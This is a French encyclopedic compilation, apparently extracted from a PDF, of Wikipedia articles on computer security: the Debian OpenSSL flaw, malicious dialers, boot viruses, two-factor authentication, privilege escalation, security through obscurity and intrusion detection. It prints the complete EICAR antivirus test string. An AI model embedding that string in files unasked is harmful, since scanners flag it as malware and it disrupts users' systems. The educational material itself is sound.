OpenSSL packagé par Debian (2006-2008) Le 17 septembre 2006, une faille de sécurité a été introduite involontairement dans la version Debian de la bibliothèque OpenSSL. C'est le mainteneur du paquet OpenSSL, Kurt Roeckx, qui a introduit le 2 mai 2006[23] une faille de sécurité dans OpenSSL en voulant corriger[24] un avertissement de l'outil Valgrind, qui était en fait un faux-positif. Le fait que la modification ait introduit une faille de sécurité est involontaire : Kurt Roeckx a contacté[25] les développeurs d'OpenSSL pour demander conseil, mais il a posté sur la mauvaise liste (openssl-users au lieu d'openssl-dev) et une confusion s'en est suivi. La première version vulnérable, 0.9.8c-1, a été téléchargée dans la distribution instable le 17 septembre 2006. La faille a été trouvée en mai 2008 et corrigée le 13 mai 2008[26]. La modification d'OpenSSL a réduit l'entropie du générateur de nombres aléatoires à seulement environ 15 bits : seul l'identifiant de processus (PID) était utilisé. Un identifiant peut avoir une valeur entre 1 et PID_MAX (32768), ce qui ne donne que 32.767 graînes possibles[27]. Au niveau des clés de chiffrement, il en existe trois fois plus, 98.301, car la génération des clés dépend de l'architecture, et dans cas 3 architectures différentes entrent en jeu (little-endian 32 bits, little-endian 64 bits et big-endian 32 bits).

Installeur Ubuntu (2005-2006) L'installeur du système d'exploitation Ubuntu, dans sa version 5.10 (Breezy Badger, sortie le 13 octobre 2005) uniquement, écrivait le mot de passe de l'utilisateur root dans plusieurs fichiers de log lisible par n'importe quel utilisateur. Le bug a été trouvé par Karl Øie le 12 mars 2006[28], puis corrigé le même jour[29]. Ce bug permet à un utilisateur local d'élever ses privilèges. Il est plus probable que ça soit un oubli des programmeurs de l'installeur, qu'une faille de sécurité introduite volontairement.

Au cinéma Le scénario du film américain WarGames repose sur une porte dérobée. Le concepteur d'un système informatique militaire y insère une porte dérobée sous la forme d'un mot de passe non-documenté qui y donne accès. Ce mot de passe donne aussi accès à des fonctionnalités non-documentées du programme, qui donne au système de contrôle d'armement l'apparence d'un jeu vidéo de simulation de guerre.

Références

[1] Kenneth Thompson, Reflections on Trusting Trust, Communication of the ACM, Vol. 27, No. 8, August 1984, pp. 761-763. (http:/ / www.

acm. org/ classics/ sep95/ ) Composeur (logiciel) 149 Composeur (logiciel)

Pour les articles homonymes, voir composeur. Composeur (en anglais, dialer) est un terme générique qui désigne un logiciel permettant de raccorder un ordinateur à un autre ordinateur, à un appareil électronique, au réseau Internet ou à un autre réseau numérique.

Historique Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [1] est la bienvenue !

Fonctionnement Le composeur tire son nom du fait qu’il compose un numéro de téléphone pour connecter l’ordinateur sur lequel il se trouve à un autre appareil. Tous les composeurs peuvent composer un numéro de téléphone. Cependant, certains contiennent des fonctions supplémentaires, ce qui fait que les différents composeurs ont des fonctions bien différentes. Certains sont légaux et d’autres sont des logiciels malveillants.

Types

Légal La plupart des ordinateurs sont munis d’un tel composeur. Il s’agit d’un logiciel (habituellement inclus dans le système d’exploitation) qui permet à l’utilisateur de l’ordinateur de communiquer avec un autre ordinateur, un appareil électronique, le réseau Internet ou un autre réseau numérique.

Malveillant

Branchement frauduleux à un autre appareil électronique Ce composeur (aussi appelé composeur d'attaque ou war dialer en anglais) est un logiciel qui balaie une série de numéros de téléphone fournis par l’utilisateur à la recherche d'un autre appareil électronique ou d’un réseau de communications. Lorsqu'il trouve un appareil électronique ou un réseau de communications, le composeur tente d'y accéder en brisant le mot de passe de l’appareil ou du réseau. Le logiciel Toneloc pour MS-DOS est l'un des plus utilisés pour perpétrer ce genre d'acte de piraterie téléphonique. L’utilisateur de l’ordinateur sur lequel se trouve ce composeur est au courant de l’activité du composeur car c’est lui qui a installé le composeur sur l’ordinateur et c’est lui qui en déclenche le fonctionnement.

Appels téléphoniques frauduleux à frais élevés Ce composeur est un logiciel malveillant, installé sur un ordinateur à l’insu de l’utilisateur de l’ordinateur, qui branche un ordinateur à un numéro de téléphone dont les frais d'utilisation sont très élevés. Les numéros de téléphone visés sont typiquement des numéros 1-900 ou des numéros de pays étrangers dont les frais sont élevés. Les pirates informatiques qui installent de tels programmes sur les ordinateurs de leurs victimes sont motivés dans leurs activités par les redevances qu’ils reçoivent pour les appels générés. Un tel composeur ne peut fonctionner que si l’ordinateur sur lequel il se trouve est relié au réseau téléphonique par un modem. Le composeur ne peut fonctionner si l’ordinateur est relié à Internet par une ligne ADSL ou par câble et que l’ordinateur n’est pas relié au réseau téléphonique par un modem. Composeur (logiciel) 150

L’utilisateur de l’ordinateur sur lequel se trouve ce composeur n’est pas au courant de l’activité du composeur car ce n’est pas lui qui a installé et déclenché le composeur. Le composeur a été installé sur son ordinateur à l’insu de l’utilisateur par un logiciel malveillant qui a contaminé son ordinateur à cause d’une protection inadéquate.

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Composeur_(logiciel)& action=edit

Charge utile

Cette page d’homonymie répertorie les différents sujets et articles partageant un même nom. __DISAMBIG__ La charge utile est ce qui est effectivement transporté par un moyen de transport donné, et qui donne lieu à un paiement ou un bénéfice non pécuniaire pour être transporté. La définition de partie « utile » peut dépendre du point de vue de celui qui utilise ce terme.

Transport Dans le monde du transport (routier, maritime ou aérien), la charge utile est aussi nommée fret. La charge utile est la masse de la matière transportée ou la matière elle-même; à opposer à la masse de l'avion, du bateau ou du camion avec son équipage, ne servant qu'à transporter cette charge utile.

Engins spatiaux Dans l'industrie spatiale, on parle de la charge utile d'un satellite pour désigner la partie qui lui permet de remplir la mission pour laquelle il a été conçu, par opposition à la plate-forme (ou service module en anglais ; le module de service, qui fournit l'énergie à l'ensemble et permet de positionner le satellite). Par exemple : • les antennes, transpondeurs et les amplificateurs d'un satellite de télécommunications • les caméras ou radiomètres pour un satellite de télédétection • les télescopes pour un satellite d'astronomie. • L'instrumentation scientifique pour une sonde spatiale. •• Le vaisseau spatial pour une mission avec équipage.

Missile Pour un missile, la charge utile est la masse de la charge militaire (explosive, chimique ou biologique).

Drones Dans le cas d'un drone, la charge utile est composée de tous les appareils embarqués pour remplir la mission assignée à l'avion sans pilote.

Informatique • Les données utiles ou la quantité de données utiles transportées par un protocole. • En informatique, on utilise ce terme au figuré pour désigner la partie du code exécutable d'un virus qui est spécifiquement destinée à nuire (par opposition au code utilisé par le virus pour se répliquer notamment). Charge utile 151

Électricité La charge représente la quantité d'électricité qui est fournie par un réseau électrique de distribution ou de transport. La charge utile représente la quantité d'électricité maximale supportée par ce réseau électrique.

Fichier de test Eicar

Pour les articles homonymes, voir EICAR. Le fichier de test Eicar est une chaîne de caractères, écrite dans un fichier informatique, destiné à tester le bon fonctionnement des logiciels antivirus. En anglais, il est dénommé « Anti-Virus test file ».

Reconnaissance Ce fichier est édité par le centre de recherche EICAR (European Institute for Computer Antivirus Research), un organisme indépendant. Il est ainsi reconnu par la majorité des éditeurs d'antivirus (tant commerciaux que libres).

Chaîne de caractères Pour tester un antivirus, il suffit de créer un fichier texte de 68 octets contenant les caractères suivants : X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Ce fichier ne contient pas de virus mais une signature qui doit être détectée par le logiciel antivirus si celui-ci est basé sur une méthode de recherche par signature. Il peut être renommé en fichier .COM, c'est un fichier exécutable MS-DOS valide inoffensif affichant "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!". Propriété inusuelle pour un programme en langage machine, le code ne contient que des caractères ASCII affichables, ce qui lui permet d'être saisi dans un éditeur de texte standard. Cela est rendu possible par l'utilisation de code automodifiable.

Annexes

Lien externe • Fichier Eicar [1]

• Portail de la sécurité informatique

Références

[1] http:/ / www. eicar. org/ anti_virus_test_file. htm Virus de boot 152 Virus de boot

Un virus de boot (ou virus de secteur d'amorçage) est un virus dont le code exécutable est enregistré dans le premier secteur. Ce secteur de démarrage maître ou Master boot record (MBR) d'un support bootable (disquette, disque dur, CD-ROM) n'est pas un fichier et sert aux systèmes d'exploitation (comme MS-DOS sur disquette) ou à certains logiciels (antivirus, test de Mémoire RAM, partitionnement de disque dur ...). Les virus de boot représentaient le quart des virus en 2000, mais cette proportion diminue très rapidement à la faveur des moyens de transmission comme le courrier électronique ou les logiciels d'échange peer to peer.

Fonctionnement Une disquette peut sembler "vide" et donc inoffensive (la commande dir affiche 2 fichiers : "." et ".."), pourtant lorsqu'on démarre un PC, suivant la configuration de celui-ci, il va exécuter le code du MBR, qui peut être le code d'un virus. Lorsqu'on démarre un ordinateur et qu'une disquette non-système est insérée, un message du type Erreur : Disquette non système s'affiche. Les virus logés sur la MBR affichent eux aussi ce message afin que tout paraisse normal, mais exécutent en plus des instructions malveillantes.

Prévention En complément d'un antivirus, il convient donc de configurer son PC pour lui interdire d'amorcer à partir des disquettes (ceci ne peut être fait qu'à partir du BIOS) car un logiciel antivirus ne peut pas modifier cette configuration, quitte à le reconfigurer si jamais on en a vraiment besoin, en cas de panne du disque dur par exemple, ou pour installer un nouveau système d'exploitation...

Configuration du BIOS Pour ce faire, il vous faudra utiliser (avec précaution) un logiciel qui réside dans la mémoire morte (ROM) de votre ordinateur : le BIOS (Basic Input Ouput System). Les informations du BIOS sont emmagasinées dans une puce mémoire (CMOS dans le BIOS). Si vous n'avez pas l'habitude d'utiliser ce logiciel, lisez absolument la notice de votre carte mère si vous l'avez, ou demandez l'aide d'un ami qui connaît un peu le BIOS, car pour que votre ordinateur fonctionne, il faut que les réglages du BIOS soient corrects (Par sécurité le BIOS vous demande toujours de confirmer vos modifications en quittant). Il existe de nombreuses version de "BIOS" ou CMOS Setup; ils se ressemblent mais ne sont pas tous identiques, c'est pourquoi on ne peut pas décrire précisément les messages affichés dans les menus.

Exemple Hurri, nommé ainsi parce qu'il a été découvert lors du passage de l'ouragan Isidore (HURRIcane Isidore en anglais) aux États Unis est un virus de ce type qui ajoute des i aux textes saisis. 153

4-Concepts et mécanismes de sécurité

Authentification forte

Cet article ne cite pas suffisamment ses sources (mars 2013). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

En sécurité des systèmes d'information, une authentification forte est une procédure d'identification qui requiert la concaténation d'au moins deux facteurs d'authentification.

Les facteurs de l'authentification forte

Les systèmes d'authentification courant utilisent un seul facteur (en général un mot de passe). Le principe de l'authentification forte est d'utiliser plusieurs facteurs de nature Principe de l'authentification forte distincte afin de rendre la tâche plus compliquée à un éventuel attaquant. Les facteurs d'authentification sont classiquement présentés comme suit : • Ce que l'entité connaît (un mot de passe, un code NIP, une phrase secrète, etc.) • Ce que l'entité détient (une carte magnétique, RFID, une clé USB, un PDA, une carte à puce, un smartphone, etc.). Soit un élément physique appelé authentifieur ou Token (par les anglophones) • Ce que l'entité est, soit une personne physique (empreinte digitale, empreinte rétinienne, structure de la main, structure osseuse du visage ou tout autre élément biométrique) • Ce que l'entité sait faire ou fait, soit une personne physique (biométrie comportementale tel que signature manuscrite, reconnaissance de la voix, un type de calcul connu de lui seul, un comportement, etc.) •• Où l'entité est, soit un endroit d'où, suite à une identification et authentification réussie, elle est autorisée (accéder à un système logique d'un endroit prescrit) Dans la majorité des cas, l'entité est une personne physique - individu - personne morale, mais elle peut être un objet comme, par exemple, une application web utilisant le protocole SSL, un serveur SSH, un objet de luxe, une marchandise, un animal, etc. Authentification forte 154

On peut considérer que l'authentification forte est une des fondations essentielles pour garantir : • L'autorisation ou contrôle d'accès (qui peut y avoir accès) • La confidentialité (qui peut le voir) • L'intégrité (qui peut le modifier) • La traçabilité (qui l'a fait) Cette approche est toutefois modulée par l'ANSSI dans son référentiel général de sécurité[2].

Représentation de l'authentification forte sous forme pyramidale.

Pourquoi l'authentification forte et l'authentification à deux-facteurs? Le mot de passe est actuellement le système le plus couramment utilisé pour authentifier un utilisateur. Il n’offre plus le niveau de sécurité requis pour assurer la protection de biens informatiques sensibles, car différentes techniques d’attaque permettent de le trouver facilement. On recense plusieurs catégories d’attaques informatiques pour obtenir un mot de passe : •• Attaque par force brute •• Attaque par dictionnaire • Écoute du clavier informatique (keylogger), par voie logicielle (cheval de troie,...), ou par écoute distante (champ électrique des claviers filaires, ou ondes radio faiblement chiffrées pour les claviers sans fils[3]) • Écoute du réseau (password sniffer) : plus facilement avec les protocole réseau sans chiffrement, comme HTTP, Telnet, FTP, LDAP, etc. • Hameçonnage (ou filoutage), appelé en anglais phishing • Attaque de l'homme du milieu ou man in the middle attack (MITM) : par exemple avec les protocoles SSL ou SSH •• Ingénierie sociale •• Extorsion d'informations par torture, chantage ou menaces L'attaque par force brute n'est pas vraiment une méthode de cassage puisque le principe est applicable à toutes les méthodes. Elle est toutefois intéressante car elle permet de définir le temps maximum que doit prendre une attaque sur une méthode cryptographique. Le but de la cryptographie est de rendre impraticable l'usage de la force brute en augmentant les délais de résistance à cette méthode. En théorie, il suffit que le délai de résistance soit supérieur à la durée de vie utile[4] de l'information à protéger. Cette durée varie selon l'importance de l'information à protéger. Authentification forte 155

Familles technologiques pour l'authentification forte On dénombre actuellement trois familles : •• One Time Password (OTP) / Mot de passe à usage unique. •• Certificat numérique •• Biométrie

One Time Password (OTP) / Mot de passe à usage unique Cette technologie permet de s'authentifier avec un mot de passe à usage unique. Elle est fondée sur l'utilisation d'un secret partagé (cryptographie symétrique) ou l'utilisation d'une carte matricielle d'authentification. Il n'est donc pas possible de garantir une véritable non-répudiation.

Certificat Numérique Cette technologie est fondée sur l'utilisation de la cryptographie asymétrique et l'utilisation d'un challenge. Il est possible de garantir la non-répudiation car uniquement l'identité possède la clé privée. • Infrastructure à clés publiques (PKI) •• RSA • PKINIT Smart Card Logon pour un environnement Microsoft

Biométrie

Cette technologie est fondée sur la reconnaissance d'une caractéristique ou d'un comportement unique. •• Biométrie • Technologie Match on Card

Liste TAN.

Authentifieur de type One-Time-Password Cette technologie est fondée sur un secret partagé unique. L'authentifieur contient le secret. Le serveur d'authentification contient le même secret. Grâce au partage de ce dénominateur commun il est alors possible de générer des mots de passe à usage unique (One-Time-Password). Du fait que ce type de technologie utilise un secret partagé il n'est pas possible d'assurer la non-répudiation. La technologie du certificat numérique permet a contrario de garantir la non-répudiation. Il existe deux modes de fonctionnement : • le fonctionnement dit synchrone, • le fonctionnement dit asynchrone Authentification forte 156

Exemple de solution de type OTP •• La liste à biffer ou TAN (Transaction Authentication Number). Il s'agit de rentrer un OTP (One-Time Password) provenant d'une liste de codes fournie par exemple par la banque. Cette liste est considérée comme un authentifieur. • Matrix card authentication ou authentification à carte matricielle. Il s'agit de rentrer un OTP provenant d'une carte matricielle fournie. Ce système utilise les coordonnées en Y et X. La carte matricielle est considérée comme un authentifieur

Fonctionnement d'une carte matricielle.

• Utilisation des SMS. Ce système utilise la technologies des SMS. L'utilisateur reçoit un OTP directement sur son téléphone portable. Le téléphone portable est considérée comme un authentifieur.

Fonctionnement d'un One Time Password via SMS.

Authentifieur fondé sur le temps

Ces authentifieurs utilisent, en plus du secret partagé, un dénominateur commun qui est le temps. Chaque partie est synchronisée sur le temps universel (UTC). On utilise alors un Code NIP comme deuxième facteur d'authentification. Ces authentifieurs sont définis comme une technologie dite synchrone. Chaque minute, par exemple, ces authentifieurs affichent un Fonctionnement d'un authentifieur fondé sur le temps. nouveau « Token Code », le One Time Password.

L'exemple le plus connu est SecurID de la société RSA Security. Authentification forte 157

Authentifieur fondé sur un compteur

Ces authentifieurs utilisent, en plus du secret partagé, un dénominateur commun qui est un compteur. Chaque partie se synchronise sur le compteur. On utilise alors un Code NIP comme deuxième facteur d'authentification. Le code NIP peut être entré sur un mini clavier. Comme la technologie fondée sur le temps, ces authentifieurs ne sont pas capables d'offrir la non-répudiation. Fonctionnement d'un authentifieur fondé sur un Ces authentifieurs sont définis comme une technologie dite compteur. synchrone.

Authentifieurs fondé sur un mécanisme de « défi réponse »

Ces authentifieurs utilisent, en plus du secret partagé, un nombre aléatoire généré par le serveur d'authentification. Le client reçoit Fonctionnement d'un authentifieur fondé sur un ce défi ou nonce et répond à celui-ci au serveur. On utilise alors un mécanisme de « Challenge Response ». Code NIP comme deuxième facteur d'authentification. Le code NIP peut être entré sur un mini clavier. Comme cette technologie utilise un secret partagé, ces authentifieurs ne sont pas capables d'offrir la non-répudiation.

Ces authentifieurs sont définis comme une technologie dite asynchrone.

Type d'Authentifieur ou « Token » PKI

Carte à puce

Pour sécuriser la clé privée et stocker le certificat numérique, la carte à puce est une solution très efficace. Cette technologie permet aussi d'implémenter d'autres fonctions telles que sécurité des bâtiments, badgeuse, etc. Généralement, la carte à puce est liée à l'utilisation d'un code NIP ou par l'utilisation de la biométrie. Lorsque la biométrie remplace le code NIP, le système offre une preuve "quasi absolue" du porteur de la carte (cf technologie Match On Card).

Carte à puce.

Authentifieur USB Ces authentifieurs utilisent la même technologie cryptographique que les cartes à puces. Ce type d'authentifieur est capable de stocker, générer du matériel cryptographique de façon très sécurisée. Ces authentifieurs sont définis comme une technologie dite connectée. En d'autres termes, il est nécessaire de « brancher » cette authentifieur sur l'ordinateur via le port USB. L'inconvénient majeur de cette technologie est qu'elle n'est pas vraiment portable. Par exemple, il est difficile d'utiliser son authentifieur USB sur une « borne » Internet (Kiosk, Hôtel, etc.). Authentification forte 158

Type d'Authentifieur ou « Token » de type Hybride

Ces authentifieurs offrent le meilleur des deux mondes. Ils sont capables de gérer les certificats numériques et d'offrir une solution très portable pour les nomades avec la technologie OTP. Exemple d'authentifieur hybride.

Annexes

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Authentification_forte& action=edit

[2] Authentification - Règles et recommandations concernant les mécanismes d'authentification (http:/ / www. ssi. gouv. fr/ IMG/ pdf/ RGS_B_3. pdf) Référentiel technique de l'ANSSI - version 1.0 du 13/01/2010

[3] We know what you typed last summer (http:/ / www. blackhat. com/ presentations/ bh-dc-08/ Moser/ Whitepaper/ bh-dc-08-moser-WP. pdf) [4][4]La durée de vie utile d'une information est la période durant laquelle cette information offre un avantage ou une confidentialité que l'on souhaite préserver de tout usage frauduleux

Liens externes

• (fr) L’Authentification de A à Z - septembre 2003 - [[Livre Blanc (http:/ / www. thehackademy. net/ madchat/

sysadm/ unix. seku/ Authentification_de_A_a_Z. pdf)]]

• (en) Authentification forte obligatoire pour les organismes financiers aux USA - octobre 2005 (http:/ / www.

ffiec. gov/ press/ pr101205. htm) • (en) Une implémentation libre (en LGPL) et donc avec le code source d'une classe en PHP et d'un outil en ligne

de commande, pour Linux et Windows, et qui supporte OATH/HOTP, OATH/TOTP et mOTP (http:/ / syscoal.

users. phpclasses. org/ package/ 6373-PHP-Authenticate-and-manage-OTP-strong-user-tokens. html)

• Portail de la sécurité informatique • Portail de la cryptologie Élévation des privilèges 159 Élévation des privilèges

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Une élévation des privilèges est, en informatique, un mécanisme permettant à un utilisateur d'obtenir des privilèges supérieurs à ceux qu'il a normalement. Généralement, un utilisateur va vouloir élever ses privilèges pour devenir administrateur du système, afin d'effectuer des tâches qu'il n'a pas le droit de faire en temps normal. Ce mécanisme est utile pour lancer des processus sensibles, pouvant nécessiter des compétences particulières en administration système : par exemple lors d'une manipulation des partitions d'un disque dur, ou lors du lancement d'un nouveau service. Cette technique peut être utilisée de manière frauduleuse par un attaquant pour prendre le contrôle total d'un système. Il peut pour cela exploiter une faille de sécurité, en local sur le système (s'il est déjà connecté dessus), ou à distance (si le système est connecté à un réseau).

Implémentations

Windows Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [1] est la bienvenue ! La boîte de dialogue d'élévation est apparue dans Windows Vista. Dans Windows XP, l'utilisateur par défaut avait les privilèges d'administrateur.

UNIX Le système de droit des systèmes de type UNIX, dont Linux et Mac OS X, définissent un droit particulier matérialisé par le bit setuid. Si un fichier exécutable possède ce droit, la commande correspondante sera exécutée avec les privilèges de l'utilisateur qui est le propriétaire de ce fichier, et non pas ceux de l’utilisateur qui lance la commande. Une commande « setuid root » possède donc les droits de l'utilisateur root pendant qu'elle est exécutée, comme si elle avait été lancée par cet utilisateur. Un mécanisme identique d'endossement des privilèges d'un groupe existe avec le mécanisme du bit setgid. Les commandes « setuid root » sont en principe peu nombreuses, car elles représentent un danger potentiel de sécurité pour le système. La commande passwd par exemple est « setuid root », ce qui permet à un utilisateur non-privilégié de changer son mot de passe dans le fichier des mots de passe /etc/passwd, alors qu'il n'a normalement pas droit de modifier ce fichier. Les deux commandes su et sudo sont aussi « setuid root ». Elles permettent de lancer une commande arbitraire (la plupart du temps, un interpréteur de commandes) en endossant les droits d'un autre utilisateur (le plus souvent, root). sudo est plus fin que su dans son mécanisme d'autorisations, mais également plus dur à paramétrer. Plusieurs interfaces graphiques à su et à sudo existent : gksu, kdesu et kdesudo. Élévation des privilèges 160

Exploitation de failles de sécurité Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [1] est la bienvenue ! Un utilitaire d'élévation populaire pour Windows NT 4 était GetAdmin, apparu en juillet 1997. Cet utilitaire exploitait une faille de sécurité du système pour s'élever aux privilèges du compte arbitraire indiqué.

Articles connexes •• Séparation des privilèges •• Setuid •• Jailbreak

• Portail de la sécurité informatique

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=%C3%89l%C3%A9vation_des_privil%C3%A8ges& action=edit

Sécurité par l'obscurité

Le principe de la sécurité par l'obscurité (de l'anglais : « security through/by obscurity ») repose sur la non-divulgation d'information relative à la structure, au fonctionnement et à l'implémentation de l'objet ou du procédé considéré, pour en assurer la sécurité. Cela s'applique aux domaines sensibles de l'informatique, de la cryptologie, de l'armement, etc.

Cryptologie En cryptologie, la sécurité par l'obscurité va à l'encontre du principe de Kerckhoffs qui veut que la sécurité de tout cryptosystème ne repose que sur le secret de la clé. Un message chiffré par exemple avec ROT13 ne peut rester secret que si la méthode utilisée pour chiffrer reste inconnue de l'adversaire. Si l'attaquant « connaît le système » alors il sera capable de déchiffrer le message. Les cryptologues prônent la transparence en matière de processus et de conception de primitives cryptographiques. Une telle pratique permet de mieux évaluer la sécurité des algorithmes.

Protection contre la rétro-ingénierie Pour éviter que quiconque puisse retrouver le code source d'un programme à partir de la version compilée (binaire), certaines sociétés utilisent des programmes pour rendre l'analyse plus ardue. Il existe différentes méthodes. On peut citer : • Obfuscation du code (voir plus bas) ; • Chiffrement du programme ; •• Exécution de code distant : une partie du programme est téléchargée à chaque lancement ; •• etc. Obfuscation du code machine : •• Ajout d'instructions valides inutiles et/ou d'arguments inutiles aux fonctions (pour rendre la lecture du code plus complexe) ; • Ajout d'instructions invalides et un saut au-dessus de ces instructions pour dérégler les désassembleurs ne supportant pas ce genre de "protection" ; • Ajout de protection anti-débogueur ; Sécurité par l'obscurité 161

•• etc. Une société peut distribuer le code source de ses programmes en les obfuscant au préalable : •• Identifiants renommés avec des noms sémantiquement muets ; • Suppression de l'indentation, voire de tous les espaces non significatifs ; •• Suppression des commentaires ; •• Ajout d'instructions inutiles ; •• Ajout d'arguments inutiles aux fonctions ; •• etc.

Exemple sur les mainframe d'IBM La société IBM développait ses principaux logiciels de mainframes dans un langage nommé PL/360[1], qui générait de l'assembleur. C'est ce code assembleur qui était fourni à ses clients réclamant les versions source des produits et non le code PL/360. Ni le compilateur du PL/360 ni la spécification du langage n'étaient fournis au public, bien que les instructions PL/360 apparussent en commentaires du listing assembleur fourni.

Les limites Par le passé, plusieurs algorithmes ou modules logiciels contenant des détails internes gardés secrets ont été révélés au public. En outre, les vulnérabilités ont été découvertes et exploitées, même si les détails internes sont restés secrets. Les exemples suivants, mis bout-à-bout, montrent la difficulté, voire l'inefficacité de garder secrets les détails des systèmes et autres algorithmes. Un procédé basé sur la sécurité par l'obscurité ment sur la réelle fiabilité de sa sécurité, au pire, ou du moins n'en affiche que les points forts, au mieux. C'est alors une simple relation de confiance établie entre les fournisseurs de l'objet, de la structure ou du procédé ainsi protégé et leurs utilisateurs qui fait référence dans la vision de la-dite sécurité. Qu'une faille sérieuse remette en cause le système devient une source de difficulté pour le fournisseur, car en plus des conséquences directes dues à la faiblesse exploitée, l'utilisateur peut se sentir abusé par le faux sentiment d'invulnérabilité dans lequel on l'a maintenu.

Exemples divers • Le chiffrement A5/1 pour les téléphones mobiles est devenu public en partie grâce à la rétro-ingénierie. Idem pour RC4 : voir Arcfour. • Les détails de l'algorithme du logiciel cryptographique RSADSI ont été révélés par une prétendue source sur Usenet. • Les vulnérabilités dans les versions successives de Microsoft Windows, son navigateur web par défaut Internet Explorer, et ses applications principales de messagerie Microsoft Outlook et Microsoft Outlook Express ont été sources d'ennuis à travers le monde quand les virus, chevaux de Troie (trojan), ou les vers informatiques les ont exploitées. • Les détails de la machine de vote électronique (société Diebold Election Systems) ont été publiés sur un site web officiel, apparemment intentionnellement.[réf. nécessaire]) • Des portions de code source du système d'exploitation Microsoft Windows 2000 ont été révélés[2] après, semble-t-il, pénétration d'un réseau de l'entreprise. • Le système d'exploitation des routeurs Cisco a été accidentellement dévoilé sur un réseau d'entreprise. Sécurité par l'obscurité 162

Ouverture et sécurité La qualité reconnue de nombreux logiciels libres en matière de sécurité (Apache, Mozilla Firefox, GnuPG) est une bonne illustration que l'ouverture ne nuit pas à la sécurité. Citation du député français Bernard Carayon dans son rapport A armes égales[3], remis au Premier Ministre en octobre 2006 : Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée.

Notes et références

[1] PL/360 : langage de programmation conçu par Niklaus Wirth pour IBM 360 et 370, voir PL/360

[2] En 2004, 13 millions de lignes de code source de Windows 2000 dans la nature! (http:/ / www. vulnerabilite. com/

code-source-windows-actualite-20040213192435. html)

[3] PDF Le rapport du député Carayon au Premier Ministre (http:/ / lesrapports. ladocumentationfrancaise. fr/ BRP/ 064000728/ 0000. pdf)

Séparation des privilèges

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

En informatique, la séparation des privilèges est un principe qui dicte que chaque fonctionnalité ne doit posséder que les privilèges et ressources nécessaires à son exécution, et rien de plus. Ainsi en cas de défaillance grave du système, les dommages ne peuvent pas dépasser ce qui est autorisé par les privilèges et les ressources utilisés, ces derniers étant eux-mêmes limités par la séparation de privilège. Le cas le plus simple à comprendre est celui d'un administrateur qui doit toujours utiliser son compte utilisateur normal lorsqu'il n'a pas besoin d'accéder à des ressources appartenant à l'utilisateur root. Lorsque l'administrateur est obligé d'utiliser le compte root, il doit en limiter le plus possible la durée afin de s'exposer le moins possible à un quelconque problème.

Bénéfices •• Une meilleure stabilité du système : les privilèges étant limités, les possibilités qu'une application puisse ralentir ou provoquer un crash système sont aussi limitées. •• Une meilleure sécurité du système : l'exploitation d'une faille dans un logiciel pour prendre le contrôle de la machine est rendue plus difficile pour un attaquant. •• Une facilité de déploiement accrue : La limitation des privilèges et ressources nécessaires à un logiciel permet de l'installer plus facilement.

Implémentation La séparation des privilèges est souvent réalisée sur des programmes dont la taille ne permet pas de s'assurer de l'absence de bug par audit de code. Dans ce cas, le programme est divisé en deux processus par l'appel système fork. Le processus contenant la plupart du code non audité va abandonner tous les privilèges et ressources dangereux, alors que le processus réalisant les opérations dangereuses va conserver juste les privilèges et ressources nécessaires à son rôle ; sa taille modeste autorisant un audit de code poussé. Le processus non audité va alors communiquer avec le processus audité pour lui faire réaliser les opérations dont il a besoin. Système de détection d'intrusion 163 Système de détection d'intrusion

Un système de détection d'intrusion (ou IDS : Intrusion Detection System) est un mécanisme destiné à repérer des activités anormales ou suspectes sur la cible analysée (un réseau ou un hôte). Il permet ainsi d'avoir une connaissance sur les tentatives réussies comme échouées des intrusions.

Les familles de systèmes de détection d'intrusion Il existe trois grandes familles distinctes d’IDS : • Les NIDS (Network Based Intrusion Detection System), qui surveillent l'état de la sécurité au niveau du réseau. • Les HIDS (HostBased Intrusion Detection System), qui surveillent l'état de la sécurité au niveau des hôtes. •• Les IDS hybrides, qui utilisent les NIDS et HIDS pour avoir des alertes plus pertinentes. Les HIDS sont particulièrement efficaces pour déterminer si un hôte est contaminé et les NIDS permettent de surveiller l’ensemble d’un réseau contrairement à un HIDS qui est restreint à un hôte.

NIDS (IDS réseau)

Introduction

Un NIDS se découpe en trois grandes parties : La capture, les signatures et les alertes.

Capture La capture sert à la récupération de trafic réseau. En général cela se fait en temps réel, bien que certains NIDS permettent l'analyse de trafic capturé précédemment. La plupart des NIDS utilisent la bibliothèque standard de capture de paquets libpcap. La bibliothèque de capture de paquets Packet Capture Library est portée sur quasiment toutes les plates-formes, ce qui permet en général aux IDS réseau de suivre. Le fonctionnement de la capture d'un NIDS est donc en général fortement lié à cette libpcap. Son mode de fonctionnement est de copier (sous Linux) tout paquet arrivant au niveau de la couche liaison de données du système d'exploitation. Une fois ce paquet copié, il lui est appliqué un filtre BPF (Berkley Packet Filter), correspondant à l'affinage de ce que l'IDS cherche à récupérer comme information. Il se peut que certains paquets soient ignorés car sous une forte charge, le système d'exploitation ne le copiera pas. Le comportement de la libpcap est différent dans le monde BSD, puisqu'il lui attache le fichier périphérique /dev/bpf, permettant ainsi aux NIDS de ne pas avoir besoin des droits super utilisateur pour capturer le trafic mais simplement de pouvoir lire sur ce fichier sur lequel les filtres sont directement compilés. Aussi, le trafic analysé n'est pas forcément égal à celui du trafic entrant, étant donné que la libpcap agit à une couche en dessous du pare-feu (qui agit au niveau réseau). Système de détection d'intrusion 164

